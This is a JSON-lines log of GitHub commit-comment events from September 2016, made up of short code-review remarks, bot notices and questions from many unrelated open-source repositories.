{"id":"4533698447","type":"CommitCommentEvent","actor":{"login":"MrUpyachka"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18944044,"position":null,"line":null,"path":null,"commit_id":"51dfc730aac114d30f9bf25cf0d26c0220f34070","created_at":"2016-09-08T12:33:54Z","updated_at":"2016-09-08T12:33:54Z","body":"Anyway, its not a way to collaborate, when i'm trying to implement tool with simple interface, but you merge it in parralel and using as shovel. It should be discussion and merge of our visions first."}},"created_at":"2016-09-08T12:33:54Z"}
{"id":"4533700700","type":"CommitCommentEvent","actor":{"login":"jacegu"},"repo":{"name":"dnsimple/dnsimple-elixir"},"payload":{"comment":{"id":18944053,"position":null,"line":null,"path":null,"commit_id":"4e23609e0a376e2e246e347e57b4880f92aa0376","created_at":"2016-09-08T12:34:22Z","updated_at":"2016-09-08T12:34:22Z","body":"Also defines the alias `get_zone` :point_right: `zone`"}},"created_at":"2016-09-08T12:34:22Z"}
{"id":"4533700798","type":"CommitCommentEvent","actor":{"login":"ruiyq"},"repo":{"name":"LnxPrgr3/crossfeed"},"payload":{"comment":{"id":18944054,"position":null,"line":null,"path":null,"commit_id":"80d3b922b076c2d191c0d4ec63a3b6145b8c6d30","created_at":"2016-09-08T12:34:23Z","updated_at":"2016-09-08T12:34:23Z","body":"After crossfeed, it sounds more naturally, but the side sound of music(music accompaniment) become weak , if you can  explain how to design filter wil be better. Thanks"}},"created_at":"2016-09-08T12:34:23Z"}
{"id":"4533705158","type":"CommitCommentEvent","actor":{"login":"Gymnasiast"},"repo":{"name":"IntelOrca/OpenRCT2"},"payload":{"comment":{"id":18944069,"position":128,"line":337,"path":"src/rct1.h","commit_id":"193309025696cd7476768673f400b48f33ac3d33","created_at":"2016-09-08T12:35:14Z","updated_at":"2016-09-08T12:35:14Z","body":"?"}},"created_at":"2016-09-08T12:35:14Z"}
{"id":"4533705775","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18944070,"position":null,"line":null,"path":null,"commit_id":"32c29dc16ef570aed6ae68099f6ee8a6a0564414","created_at":"2016-09-08T12:35:20Z","updated_at":"2016-09-08T12:35:20Z","body":"Ok gimme a sec i will do it"}},"created_at":"2016-09-08T12:35:20Z"}
{"id":"4533707744","type":"CommitCommentEvent","actor":{"login":"septagram"},"repo":{"name":"delormejonathan/laravel-js-routing"},"payload":{"comment":{"id":18944076,"position":null,"line":null,"path":null,"commit_id":"986c1b977d6918d1ce382ed25175cd928d15ce62","created_at":"2016-09-08T12:35:45Z","updated_at":"2016-09-08T12:35:45Z","body":"Why did you make this change? This actually breaks the route generation for me, as `action()` expects a path to action relative to the controllers namespace,\r\n\r\nFurthermore, `$route->getPath()` appears to be more intuitive and more uniform to me, and doesn't appear to be deprecated. Is there something wrong with that approach?"}},"created_at":"2016-09-08T12:35:45Z"}
{"id":"4533711319","type":"CommitCommentEvent","actor":{"login":"karmatosed"},"repo":{"name":"Automattic/theme-components"},"payload":{"comment":{"id":18944084,"position":null,"line":null,"path":null,"commit_id":"e35fb9de140521a57e5df9a66ee41bbf7ae66878","created_at":"2016-09-08T12:36:29Z","updated_at":"2016-09-08T12:36:29Z","body":"@sarahmonster personally I'm not keen we change this as in my knowledge it's not an agreed format. However, is there some documentation you have that suggests this would be?"}},"created_at":"2016-09-08T12:36:29Z"}
{"id":"4533712875","type":"CommitCommentEvent","actor":{"login":"jturcotte"},"repo":{"name":"owncloud/client"},"payload":{"comment":{"id":18944093,"position":20,"line":63,"path":"src/gui/folderwatcher.cpp","commit_id":"b9f6e84d569e2bbbc787082c48b9cb652daf99e4","created_at":"2016-09-08T12:36:50Z","updated_at":"2016-09-08T12:36:50Z","body":"Wouldn't it work to just also use `QFileInfo(relPath).canonicalFilePath()` to compare? Is the path always absolute?"}},"created_at":"2016-09-08T12:36:50Z"}
{"id":"4533714977","type":"CommitCommentEvent","actor":{"login":"MarcinKosinski"},"repo":{"name":"mi2-warsaw/FSelectorRcpp"},"payload":{"comment":{"id":18944099,"position":null,"line":null,"path":null,"commit_id":"12790e7c82289f743d20f7de78f1aa7a9fe09d71","created_at":"2016-09-08T12:37:16Z","updated_at":"2016-09-08T12:37:16Z","body":"I know biologists that would like to use Big Data and Genomic Sequencing\n(300 PB) on 32-bit : )\n\n2016-09-08 14:27 GMT+02:00 Zygmunt Zawadzki <notifications@github.com>:\n\n> They probably don't need to run our tests (in which we use rJava).\n> Everything else is fine.\n>\n> Do you know anyone who uses 32bit system? Heeey! It's 2016, 2006 is gone!\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mi2-warsaw/FSelectorRcpp/commit/12790e7c82289f743d20f7de78f1aa7a9fe09d71#commitcomment-18943961>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGdazqmlXQ4qmbpqL9viaKWiXv8KXaK5ks5qn_9BgaJpZM4J34uD>\n> .\n>\n"}},"created_at":"2016-09-08T12:37:16Z"}
{"id":"4533717160","type":"CommitCommentEvent","actor":{"login":"BatedUrGonnaDie"},"repo":{"name":"BatedUrGonnaDie/Autosplitters"},"payload":{"comment":{"id":18944103,"position":20,"line":18,"path":"Refunct/Refunct.asl","commit_id":"28d2c5d8691fa6c897f9e7aafc824a4050964646","created_at":"2016-09-08T12:37:42Z","updated_at":"2016-09-08T12:37:42Z","body":"That would actually be amazing.  Thank you in advance for this :+1:"}},"created_at":"2016-09-08T12:37:42Z"}
{"id":"4533717182","type":"CommitCommentEvent","actor":{"login":"ellisonanne"},"repo":{"name":"apache/incubator-pirk"},"payload":{"comment":{"id":18944104,"position":null,"line":null,"path":null,"commit_id":"c7fc6ec8719e7b1df5ff3f3baa8bab17643a8454","created_at":"2016-09-08T12:37:42Z","updated_at":"2016-09-08T12:37:42Z","body":"Sure - seems like that would be fine"}},"created_at":"2016-09-08T12:37:42Z"}
{"id":"4533718559","type":"CommitCommentEvent","actor":{"login":"GennadiyK"},"repo":{"name":"GennadiyK/bookingYourTeacher"},"payload":{"comment":{"id":18944109,"position":null,"line":null,"path":null,"commit_id":"a06e023ea15beaa1b19e45861bed5e8f9dc18df9","created_at":"2016-09-08T12:38:00Z","updated_at":"2016-09-08T12:38:00Z","body":"Please correct your style with a methodology BEM. You did a lot not necessary nestings.  https://ru.bem.info/methodology/css/"}},"created_at":"2016-09-08T12:38:00Z"}
{"id":"4533721998","type":"CommitCommentEvent","actor":{"login":"kamakshidasan"},"repo":{"name":"FOSSEE/xcos-on-web"},"payload":{"comment":{"id":18944114,"position":59,"line":59,"path":"testing/SendLog/SendLog.py","commit_id":"9ec9152b636591ca4d9bf85e1fc0322c57bb9fd7","created_at":"2016-09-08T12:38:41Z","updated_at":"2016-09-08T12:38:41Z","body":"It's definitely possible to combine both the loops into one."}},"created_at":"2016-09-08T12:38:41Z"}
{"id":"4533728008","type":"CommitCommentEvent","actor":{"login":"kamakshidasan"},"repo":{"name":"FOSSEE/xcos-on-web"},"payload":{"comment":{"id":18944129,"position":31,"line":34,"path":"testing/SendLog/SendLog.py","commit_id":"9ec9152b636591ca4d9bf85e1fc0322c57bb9fd7","created_at":"2016-09-08T12:40:03Z","updated_at":"2016-09-08T12:40:03Z","body":"If you modify the output line from Scilab, you could very well Initialization in the first position itself. You wouldn't need use 'count', in that case."}},"created_at":"2016-09-08T12:40:03Z"}
{"id":"4533730612","type":"CommitCommentEvent","actor":{"login":"romanivanov21"},"repo":{"name":"romanivanov21/web_server"},"payload":{"comment":{"id":18944135,"position":26,"line":25,"path":"src/logs/server_log.cpp","commit_id":"3735fc1bee1188b1bbf4087e02055fcc119c3be1","created_at":"2016-09-08T12:40:35Z","updated_at":"2016-09-08T12:40:35Z","body":"А так не лучше std::string log_msg = create_log_struct( msg );"}},"created_at":"2016-09-08T12:40:35Z"}
{"id":"4533731380","type":"CommitCommentEvent","actor":{"login":"andela-amwaleh"},"repo":{"name":"andela-lolo/office-space-allocation"},"payload":{"comment":{"id":18944138,"position":37,"line":38,"path":"app/person/personClass.py","commit_id":"824af6898b9ce8c39a69be2ef57d9446bce2bfc4","created_at":"2016-09-08T12:40:45Z","updated_at":"2016-09-08T12:40:45Z","body":"How about assigning wants_accomodation to a boolean `wants_accomodation = True`"}},"created_at":"2016-09-08T12:40:45Z"}
{"id":"4533736373","type":"CommitCommentEvent","actor":{"login":"kosloot"},"repo":{"name":"LanguageMachines/ucto"},"payload":{"comment":{"id":18944150,"position":null,"line":null,"path":null,"commit_id":"77188bd824c1240258ed42822c64e70ecacd3244","created_at":"2016-09-08T12:41:44Z","updated_at":"2016-09-08T12:41:44Z","body":"right ...\r\nBut for every fix you think it is the final one :P"}},"created_at":"2016-09-08T12:41:44Z"}
{"id":"4533740738","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18944163,"position":null,"line":null,"path":null,"commit_id":"7f6bacae67ed75fe689810d0776d426180997852","created_at":"2016-09-08T12:42:35Z","updated_at":"2016-09-08T12:42:35Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=24)"}},"created_at":"2016-09-08T12:42:35Z"}
{"id":"4533741058","type":"CommitCommentEvent","actor":{"login":"andela-amwaleh"},"repo":{"name":"andela-lolo/office-space-allocation"},"payload":{"comment":{"id":18944165,"position":63,"line":58,"path":"app/person/personClass.py","commit_id":"824af6898b9ce8c39a69be2ef57d9446bce2bfc4","created_at":"2016-09-08T12:42:39Z","updated_at":"2016-09-08T12:42:39Z","body":"if `wants_accomodation` is a boolean you wont need to check for `Y` twice"}},"created_at":"2016-09-08T12:42:39Z"}
{"id":"4533742437","type":"CommitCommentEvent","actor":{"login":"kamakshidasan"},"repo":{"name":"FOSSEE/xcos-on-web"},"payload":{"comment":{"id":18944171,"position":38,"line":41,"path":"testing/SendLog/SendLog.py","commit_id":"9ec9152b636591ca4d9bf85e1fc0322c57bb9fd7","created_at":"2016-09-08T12:42:56Z","updated_at":"2016-09-08T12:42:56Z","body":"There should be consistency, you should return the ID, here as well."}},"created_at":"2016-09-08T12:42:56Z"}
{"id":"4533743295","type":"CommitCommentEvent","actor":{"login":"Vipeax"},"repo":{"name":"PatrickRorth/Twitch.TV"},"payload":{"comment":{"id":18944173,"position":null,"line":null,"path":null,"commit_id":"945915206f329b9646314afa1956e9940365338b","created_at":"2016-09-08T12:43:05Z","updated_at":"2016-09-08T12:43:05Z","body":"Have you considered using JSONP?"}},"created_at":"2016-09-08T12:43:05Z"}
{"id":"4533745500","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18944179,"position":null,"line":null,"path":null,"commit_id":"7f6bacae67ed75fe689810d0776d426180997852","created_at":"2016-09-08T12:43:30Z","updated_at":"2016-09-08T12:43:30Z","body":"Collaborator:\nCorresponding review in collaborator has been completed. [Link to review](http://127.0.0.1:8080/ui#review:id=24)\nAuthor: test1 test1\nReviewer: test2 test2"}},"created_at":"2016-09-08T12:43:30Z"}
{"id":"4533747850","type":"CommitCommentEvent","actor":{"login":"kamakshidasan"},"repo":{"name":"FOSSEE/xcos-on-web"},"payload":{"comment":{"id":18944189,"position":34,"line":37,"path":"testing/SendLog/SendLog.py","commit_id":"9ec9152b636591ca4d9bf85e1fc0322c57bb9fd7","created_at":"2016-09-08T12:43:58Z","updated_at":"2016-09-08T12:43:58Z","body":"As far as possible, try to use full names - try using figureID instead of figID - This is just a good coding practice. :)"}},"created_at":"2016-09-08T12:43:58Z"}
{"id":"4533748563","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18944190,"position":null,"line":null,"path":null,"commit_id":"aacfca8139dc7750e68695df33b70610b9c195df","created_at":"2016-09-08T12:44:08Z","updated_at":"2016-09-08T12:44:08Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=25)"}},"created_at":"2016-09-08T12:44:08Z"}
{"id":"4533749226","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18944191,"position":null,"line":null,"path":null,"commit_id":"2636a7d8176ff0585de5e9db7df55b7fcd1fea5f","created_at":"2016-09-08T12:44:15Z","updated_at":"2016-09-08T12:44:15Z","body":"No STC-Test needed for this?"}},"created_at":"2016-09-08T12:44:15Z"}
{"id":"4533749259","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18944192,"position":null,"line":null,"path":null,"commit_id":"aacfca8139dc7750e68695df33b70610b9c195df","created_at":"2016-09-08T12:44:15Z","updated_at":"2016-09-08T12:44:15Z","body":"Collaborator:\nCorresponding review in collaborator has been deleted."}},"created_at":"2016-09-08T12:44:15Z"}
{"id":"4533753846","type":"CommitCommentEvent","actor":{"login":"jturney"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":18944202,"position":31,"line":308,"path":"psi4/share/psi4/python/molutil.py","commit_id":"04f9b104db7f7e8ad30eea0aa355e6bfbd3c644f","created_at":"2016-09-08T12:45:11Z","updated_at":"2016-09-08T12:45:11Z","body":"It may be as simple as changing lines 289 and 294 above to use ```self.cdict``` instead of ```variables```.  Have you already tried this?"}},"created_at":"2016-09-08T12:45:11Z"}
{"id":"4533754416","type":"CommitCommentEvent","actor":{"login":"shelaf"},"repo":{"name":"jackhumbert/qmk_firmware"},"payload":{"comment":{"id":18944203,"position":35,"line":23,"path":"keyboards/ergodox/keymaps/romanzolotarev-norman-osx/readme.md","commit_id":"da16733e7ab66ebd27fde21312990f5733966a52","created_at":"2016-09-08T12:45:17Z","updated_at":"2016-09-08T12:45:17Z","body":"Probably, `SHIRT` is typo."}},"created_at":"2016-09-08T12:45:17Z"}
{"id":"4533755648","type":"CommitCommentEvent","actor":{"login":"wkentaro"},"repo":{"name":"ros-perception/opencv_apps"},"payload":{"comment":{"id":18944207,"position":7,"line":137,"path":"src/nodelet/lk_flow_nodelet.cpp","commit_id":"3ab28cf0bc07d4ce53537650bfd9cb59ab3be07f","created_at":"2016-09-08T12:45:30Z","updated_at":"2016-09-08T12:45:30Z","body":"Would u like to use it for testing or just trying on your pc?\r\nFor former case,\r\n```\r\n$ roslaunch jsk_perception sample_image_publisher.launch gui:=false\r\n$ rostopic echo /raw_image_bgr/image_color  --noarr # bgr8\r\n$ rostopic echo /raw_image_rgb/image_color  --noarr # rgb8\r\n```"}},"created_at":"2016-09-08T12:45:30Z"}
{"id":"4533761244","type":"CommitCommentEvent","actor":{"login":"grunenwald"},"repo":{"name":"HE-Arc/php-intro-framework"},"payload":{"comment":{"id":18944227,"position":2,"line":1,"path":"LICENSE","commit_id":"b1b90ea8e675e0be0948ef1de7953a03bbc93fc5","created_at":"2016-09-08T12:46:35Z","updated_at":"2016-09-08T12:46:35Z","body":"Merci, c'est fait !"}},"created_at":"2016-09-08T12:46:35Z"}
{"id":"4533761790","type":"CommitCommentEvent","actor":{"login":"kamakshidasan"},"repo":{"name":"FOSSEE/xcos-on-web"},"payload":{"comment":{"id":18944228,"position":67,"line":67,"path":"testing/SendLog/SendLog.py","commit_id":"9ec9152b636591ca4d9bf85e1fc0322c57bb9fd7","created_at":"2016-09-08T12:46:42Z","updated_at":"2016-09-08T12:46:42Z","body":"'Never ever ever' use 'break'\r\n\r\nTo stress how much, I mean that - Think of me saying that phrase in this voice - https://www.youtube.com/watch?v=8tF9YSXe2vo"}},"created_at":"2016-09-08T12:46:42Z"}
{"id":"4533763322","type":"CommitCommentEvent","actor":{"login":"jnjolstad"},"repo":{"name":"kbalog/uis-dat630-fall2016"},"payload":{"comment":{"id":18944232,"position":null,"line":null,"path":null,"commit_id":"c79bbf00b7636d4dbfaa0b1805519b23af8c7c17","created_at":"2016-09-08T12:47:00Z","updated_at":"2016-09-08T12:47:00Z","body":"The file dt_example.py does not give any output, instead it gives the error:\r\n`  File \"dt_example.py\", line 33, in __init__\r\n    assert type in AttrType\r\nTypeError: argument of type 'type' is not iterable`"}},"created_at":"2016-09-08T12:47:00Z"}
{"id":"4533765166","type":"CommitCommentEvent","actor":{"login":"cbismuth"},"repo":{"name":"cbismuth/dot-idea"},"payload":{"comment":{"id":18944237,"position":null,"line":null,"path":null,"commit_id":"2a1b795f192dda2d6e49243c5feb403d4425b275","created_at":"2016-09-08T12:47:21Z","updated_at":"2016-09-08T12:47:21Z","body":"https://github.com/cbismuth/fdupes-java/issues/48"}},"created_at":"2016-09-08T12:47:21Z"}
{"id":"4533766635","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18944240,"position":null,"line":null,"path":null,"commit_id":"fe65ba628f2d6a84d469450cfd3265ef7b0b957b","created_at":"2016-09-08T12:47:37Z","updated_at":"2016-09-08T12:47:37Z","body":"bonus = d^1.91 + 6d - 6\r\n\r\nComparison between old and new values:\r\nd: 1 val 1 oldval 1\r\nd: 2 val 9 oldval 6\r\nd: 3 val 20 oldval 13\r\nd: 4 val 32 oldval 22\r\nd: 5 val 45 oldval 33\r\nd: 6 val 60 oldval 46\r\nd: 7 val 77 oldval 61\r\nd: 8 val 95 oldval 78\r\nd: 9 val 114 oldval 97\r\nd: 10 val 135 oldval 118\r\nd: 11 val 157 oldval 141\r\nd: 12 val 181 oldval 166\r\nd: 13 val 206 oldval 193\r\nd: 14 val 232 oldval 222\r\nd: 15 val 260 oldval 253\r\nd: 16 val 289 oldval 286\r\nd: 17 val 319 oldval 321"}},"created_at":"2016-09-08T12:47:37Z"}
{"id":"4533766900","type":"CommitCommentEvent","actor":{"login":"rduivenvoorde"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18944241,"position":null,"line":null,"path":null,"commit_id":"69bed218373b3f93671f65bc3d02c45cbf683a48","created_at":"2016-09-08T12:47:40Z","updated_at":"2016-09-08T12:47:40Z","body":"@pvalsecc I think you are right in your analysis, see also:\r\n\r\nhttps://lists.osgeo.org/pipermail/qgis-user/2016-September/037674.html\r\n\r\nThanks for your response"}},"created_at":"2016-09-08T12:47:40Z"}
{"id":"4533768866","type":"CommitCommentEvent","actor":{"login":"kamakshidasan"},"repo":{"name":"FOSSEE/xcos-on-web"},"payload":{"comment":{"id":18944248,"position":91,"line":81,"path":"testing/SendLog/SendLog.py","commit_id":"9ec9152b636591ca4d9bf85e1fc0322c57bb9fd7","created_at":"2016-09-08T12:48:04Z","updated_at":"2016-09-08T12:48:04Z","body":"How do you get 'figID' - You haven't returned it above!"}},"created_at":"2016-09-08T12:48:04Z"}
{"id":"4533774379","type":"CommitCommentEvent","actor":{"login":"LuxAsteria"},"repo":{"name":"LuxAsteria/computationalphysics_N2014301020172"},"payload":{"comment":{"id":18944263,"position":null,"line":null,"path":null,"commit_id":"2c5859a05b503cef4460bbb071b5eef024dd1269","created_at":"2016-09-08T12:49:07Z","updated_at":"2016-09-08T12:49:07Z","body":"- [ ] exercise 1\r\n\r\n- [ ] exercise 2\r\n\r\n- [ ] exercise 3\r\n\r\n- [ ] exercise 4\r\n\r\n- [ ] exercise 5\r\n\r\n- [ ] exercise 6"}},"created_at":"2016-09-08T12:49:07Z"}
{"id":"4533777270","type":"CommitCommentEvent","actor":{"login":"delormejonathan"},"repo":{"name":"delormejonathan/laravel-js-routing"},"payload":{"comment":{"id":18944271,"position":null,"line":null,"path":null,"commit_id":"986c1b977d6918d1ce382ed25175cd928d15ce62","created_at":"2016-09-08T12:49:42Z","updated_at":"2016-09-08T12:49:42Z","body":"It was a mistake, it will be reverted next commit !"}},"created_at":"2016-09-08T12:49:42Z"}
{"id":"4533778619","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"dirkschumacher/ompr"},"payload":{"comment":{"id":18944276,"position":null,"line":null,"path":null,"commit_id":"36be72d51b73056fedc3898b29eac8feb5092d90","created_at":"2016-09-08T12:49:57Z","updated_at":"2016-09-08T12:49:57Z","body":"[R/class-model.R:307:1:](https://github.com/dirkschumacher/ompr/blob/36be72d51b73056fedc3898b29eac8feb5092d90/R/class-model.R#L307) *style:* **lines should not be more than 80 characters.**\n```r\n​                \"Take a look at one of the vignettes on how to call solve_model.\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-08T12:49:57Z"}
{"id":"4533781044","type":"CommitCommentEvent","actor":{"login":"shaunburdick"},"repo":{"name":"chrso/slack-ooo"},"payload":{"comment":{"id":18944281,"position":3,"line":3,"path":"release/js/config.js","commit_id":"338698f76f7c49bc42e84fa9f1cafe80e70414f4","created_at":"2016-09-08T12:50:26Z","updated_at":"2016-09-08T12:50:26Z","body":"You shouldn't put tokens on the web for everyone to see and steal ;-)"}},"created_at":"2016-09-08T12:50:26Z"}
{"id":"4533782907","type":"CommitCommentEvent","actor":{"login":"Moharu"},"repo":{"name":"atropelando/terceiro-ano-programacao"},"payload":{"comment":{"id":18944290,"position":null,"line":null,"path":null,"commit_id":"4d736ad68b65e60c5b90de4355c29122225fd22a","created_at":"2016-09-08T12:50:46Z","updated_at":"2016-09-08T12:50:46Z","body":"Adorei, 11/10"}},"created_at":"2016-09-08T12:50:46Z"}
{"id":"4533784279","type":"CommitCommentEvent","actor":{"login":"PWKad"},"repo":{"name":"aurelia/dialog"},"payload":{"comment":{"id":18944295,"position":22,"line":91,"path":"test/unit/dialog-service.spec.js","commit_id":"79e39a76067f949a49b30e68bce6aa2570812d4a","created_at":"2016-09-08T12:51:01Z","updated_at":"2016-09-08T12:51:01Z","body":"Sure probably better that way"}},"created_at":"2016-09-08T12:51:01Z"}
{"id":"4533784628","type":"CommitCommentEvent","actor":{"login":"hafizzhang"},"repo":{"name":"hafizzhang/ssm"},"payload":{"comment":{"id":18944296,"position":null,"line":null,"path":null,"commit_id":"9f1b6457a99a6db6b6ca672c110269defc0876b0","created_at":"2016-09-08T12:51:06Z","updated_at":"2016-09-08T12:51:06Z","body":"init project"}},"created_at":"2016-09-08T12:51:06Z"}
{"id":"4533785264","type":"CommitCommentEvent","actor":{"login":"xvsaisai"},"repo":{"name":"xvsaisai/YoHo88"},"payload":{"comment":{"id":18944298,"position":5,"line":5,"path":"readme","commit_id":"c11788bfb40de12f88a3b22589315ce26dc250fb","created_at":"2016-09-08T12:51:13Z","updated_at":"2016-09-08T12:51:13Z","body":"使用的三方框架："}},"created_at":"2016-09-08T12:51:13Z"}
{"id":"4533785867","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18944301,"position":null,"line":null,"path":null,"commit_id":"65f0b974cb65a6588a54de96f0ce929f57e39f59","created_at":"2016-09-08T12:51:19Z","updated_at":"2016-09-08T12:51:19Z","body":"My thinking was that a user choosing the 2.0 build would not expect to use Func . We already had other usage of Func not compiled in the 2.0 build."}},"created_at":"2016-09-08T12:51:19Z"}
{"id":"4533788928","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":18944311,"position":null,"line":null,"path":null,"commit_id":"0814f63615615f966f1c2c92732658b3a726ad1b","created_at":"2016-09-08T12:51:53Z","updated_at":"2016-09-08T12:51:53Z","body":"Very nice "}},"created_at":"2016-09-08T12:51:53Z"}
{"id":"4533790411","type":"CommitCommentEvent","actor":{"login":"somebody1234"},"repo":{"name":"LogicodeLang/Logicode"},"payload":{"comment":{"id":18944314,"position":null,"line":null,"path":null,"commit_id":"2542f7726509ba9f15ef6dab36f3de6e5e43afc3","created_at":"2016-09-08T12:52:12Z","updated_at":"2016-09-08T12:52:12Z","body":"@DerpfacePython Yeah, didn't change it before because I had the wrong idea of what tail meant, the way I thought it worked both heads and tails returned a 1-length list. (btw, always return bits as a list of 1 and 0)"}},"created_at":"2016-09-08T12:52:12Z"}
{"id":"4533792049","type":"CommitCommentEvent","actor":{"login":"xvsaisai"},"repo":{"name":"xvsaisai/YoHo88"},"payload":{"comment":{"id":18944323,"position":5,"line":5,"path":"readme","commit_id":"c11788bfb40de12f88a3b22589315ce26dc250fb","created_at":"2016-09-08T12:52:31Z","updated_at":"2016-09-08T12:52:31Z","body":"okhttp做网络加载\r\nPicasso做图片加载\r\nGson做Json解析"}},"created_at":"2016-09-08T12:52:31Z"}
{"id":"4533793019","type":"CommitCommentEvent","actor":{"login":"raphink"},"repo":{"name":"speedata/hyphenation"},"payload":{"comment":{"id":18944327,"position":1,"line":1,"path":"Readme.md","commit_id":"da9f06d81fcd3b06b44ac4decdfcf8ace3135bf1","created_at":"2016-09-08T12:52:42Z","updated_at":"2016-09-08T12:52:42Z","body":"Are you going to port LuaTex to Go? :smile: "}},"created_at":"2016-09-08T12:52:42Z"}
{"id":"4533793230","type":"CommitCommentEvent","actor":{"login":"dKend"},"repo":{"name":"zjresler/ByDefaultProject"},"payload":{"comment":{"id":18944328,"position":null,"line":null,"path":null,"commit_id":"3ad5efd6d2047795ff83c2a4d16730d984cb33bd","created_at":"2016-09-08T12:52:45Z","updated_at":"2016-09-08T12:52:45Z","body":"Made a few spelling corrections and formatted the meeting rules into a crude list. I also added a bit to the disciplinary action section. Had to upload as a .pdf for some reason since I have yet to install word on my current laptop. I had to upload the original to google docs before editing, and github didn't like the .docx file that I re-downloaded from docs.\r\n[By Default charter.pdf](https://github.com/zjresler/ByDefaultProject/files/461655/By.Default.charter.pdf)\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-08T12:52:45Z"}
{"id":"4533793778","type":"CommitCommentEvent","actor":{"login":"Dridi"},"repo":{"name":"varnishcache/varnish-cache"},"payload":{"comment":{"id":18944332,"position":null,"line":null,"path":null,"commit_id":"f70bcbc490121e21b227330ebb2a19cd477bb10c","created_at":"2016-09-08T12:52:51Z","updated_at":"2016-09-08T12:52:51Z","body":"Where is `q` assigned? Is the assertion ever reached?"}},"created_at":"2016-09-08T12:52:51Z"}
{"id":"4533797346","type":"CommitCommentEvent","actor":{"login":"LuxAsteria"},"repo":{"name":"LuxAsteria/test"},"payload":{"comment":{"id":18944336,"position":1,"line":1,"path":"README.md","commit_id":"e16df056853f0f2307c59085def220571cd0c064","created_at":"2016-09-08T12:53:32Z","updated_at":"2016-09-08T12:53:32Z","body":"- [ ] 11"}},"created_at":"2016-09-08T12:53:32Z"}
{"id":"4533798170","type":"CommitCommentEvent","actor":{"login":"gengiebattad78"},"repo":{"name":"charlieasemota/philomina-wp"},"payload":{"comment":{"id":18944337,"position":null,"line":null,"path":null,"commit_id":"8ad186092397a01519d98ec450fced3c0a3b88f9","created_at":"2016-09-08T12:53:41Z","updated_at":"2016-09-08T12:53:41Z","body":"hi how to create the screen shots> i am just new here? thanks"}},"created_at":"2016-09-08T12:53:41Z"}
{"id":"4533799646","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18944344,"position":335,"line":335,"path":"tutorials/01_requests_click.md","commit_id":"283251ba5b5d450a61373d576efa4dfa3fbf6984","created_at":"2016-09-08T12:54:00Z","updated_at":"2016-09-08T12:54:00Z","body":"Přidej tam plz [Sirius API](http://cvut.github.io/sirius/docs/api-v1.html) (před KOSapi). Myslím, že pro řadu studentů bude zajímavější než KOSapi a hlavně poskytuje normální JSON, ne šílené XML…\r\n\r\nA k Siriu ti ještě dodám nějaké tipy na semestrálky. :)"}},"created_at":"2016-09-08T12:54:00Z"}
{"id":"4533801255","type":"CommitCommentEvent","actor":{"login":"paradadf"},"repo":{"name":"recalbox/i18n.recalbox.com"},"payload":{"comment":{"id":18944366,"position":null,"line":null,"path":null,"commit_id":"ebb930e753e54ec83e83ae92a266a89aa0f4bdf0","created_at":"2016-09-08T12:54:18Z","updated_at":"2016-09-08T12:54:18Z","body":"Line 191: recalboxOS"}},"created_at":"2016-09-08T12:54:18Z"}
{"id":"4533802197","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18944368,"position":null,"line":null,"path":null,"commit_id":"d37ab8889af90c2c3b459fd90fd28a3394d0a26b","created_at":"2016-09-08T12:54:29Z","updated_at":"2016-09-08T12:54:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 964](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12925&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T12:54:29Z"}
{"id":"4533804461","type":"CommitCommentEvent","actor":{"login":"j27mayuresh"},"repo":{"name":"j27mayuresh/C-programs"},"payload":{"comment":{"id":18944373,"position":null,"line":null,"path":null,"commit_id":"871b3255f560f781b8a4aa55ff751bac5fa09ca2","created_at":"2016-09-08T12:54:55Z","updated_at":"2016-09-08T12:54:55Z","body":"Final"}},"created_at":"2016-09-08T12:54:55Z"}
{"id":"4533807794","type":"CommitCommentEvent","actor":{"login":"melke"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18944379,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T12:55:31Z","updated_at":"2016-09-08T12:55:31Z","body":"Thanks @cescoffier ! I didn't quite understand the second paragraph though. Do you mean that since the synchronized code blocks in the Guava impl would not really block anything in practice, because the guava cache is always called from the same verticle/thread? So your recommendation would then be to use the Guava cache \"as is\", without any wrapping in executeBlocking, but be very careful to call the cache only from one verticle? "}},"created_at":"2016-09-08T12:55:31Z"}
